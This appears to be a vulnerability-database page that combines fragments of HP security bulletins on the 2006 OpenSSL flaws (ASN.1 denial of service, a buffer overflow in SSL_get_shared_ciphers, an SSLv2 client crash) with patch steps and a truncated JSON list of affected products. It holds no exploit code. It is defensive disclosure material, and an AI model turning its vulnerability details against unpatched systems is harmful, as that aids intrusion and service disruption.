    HP Tru64 UNIX Version 4.0F PK8 ERP Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=DUXKIT1001165-V40FB22-ES-20070316 Name: DUXKIT1001165-V40FB22-ES-20070316 MD5 Checksum: 718148c87a913536b32a47af4c36b04e

    HP Insight Management Agents for Tru64 UNIX patch version 3.6.1 (for kit CPQIIM360) Location: http://h30097.www3.hp.com/cma/patches.html Name: CPQIM360.SSL.01.tar.gz MD5 Checksum: 1001a10ab642461c87540826dfe28652

    Internet Express (IX) v 6.6 BIND Note: Customers who use Internet Express (IX) v 6.6 BIND should install the BIND 9.2.8 patch from the ERP kit appropriate for their base operating system version.

    PRODUCT SPECIFIC INFORMATION

    The HP Tru64 UNIX v 5.1B-3 and v 5.1B-4 ERP kits distribute two patches: -OpenSSL 0.9.8d -BIND 9.2.8 built with OpenSSL 0.9.8d

    Note: HP Tru64 UNIX v 5.1A, v 4.0G, and v 4.0F releases did not distribute OpenSSL and so their ERP kits provide only the BIND 9.2.8 patch that has been built with OpenSSL 0.9.8d

    Customers who have been using OpenSSL on HP Tru64 UNIX v 5.1B-3 and v 5.1B-4 should install the OpenSSL patch from the ERP kit appropriate for their base operating system version.

    The HP Insight Management Agents for Tru64 UNIX patch contains OpenSSL 0.9.8d and is applicable for HP Tru64 UNIX v 5.1A, v 5.1B-3, and v 5.1B-4. ASN.1 Denial of Service Attack (1/2)

     During the parsing of certain invalid ASN.1 structures an error
     condition is mishandled. This can result in an infinite loop which
     consumes system memory. ASN.1 Denial of Service Attack (2/2)
    
     Certain types of public key can take disproportionate amounts of
     time to process. This could be used by an attacker in a denial of
     service attack. SSL_get_shared_ciphers() Buffer Overflow
    
     A buffer overflow was discovered in the SSL_get_shared_ciphers()
     utility function. SSLv2 Client Crash
    
     A flaw in the SSLv2 client code was discovered.
    

    References: [0] http://www.openssl.org/news/secadv_20060928.txt [1] http://www.openssl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG openpkg@openpkg.org" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c00849540 Version: 1

    HPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2007-01-17 Last Updated: 2007-01-23

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX.

    References: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969.

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01

    BACKGROUND

    AFFECTED VERSIONS

    For IPv4: HP-UX B.11.00 HP-UX B.11.11 =========== hpuxwsAPACHE action: install revision A.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    For IPv6: HP-UX B.11.11 =========== hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.23

    hpuxwsAPACHE action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    END AFFECTED VERSIONS

    RESOLUTION

    HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent.

    Apache Update Procedure

    Check for Apache Installation


    To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -I apache hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

    Stop Apache


    Before updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

    Download and Install Apache


    Download Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

    Removing Apache Installation


    The potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor's "swremove" command and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables. %ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

    MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product.

    PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

    HISTORY: rev.1 - 23 January 2007 Initial Release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2007 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. HP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows.

    BACKGROUND

    RESOLUTION HP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200609-1416",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "11.5.10cu2"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "9.2.0.8"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.1"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "model": "turbolinux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10_f"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (hosting)"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (workgroup)"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "2.0"
          },
          {
            "model": "turbolinux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "model": "turbolinux fuji",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux multimedia",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux personal",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10 (x64)"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11 (x64)"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "7"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "8"
          },
          {
            "model": "wizpy",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "trendmicro interscan web security suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "trend micro",
            "version": "1.1 solaris edition"
          },
          {
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3.0"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "model": "linux advanced workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "model": "linux enterprise server",
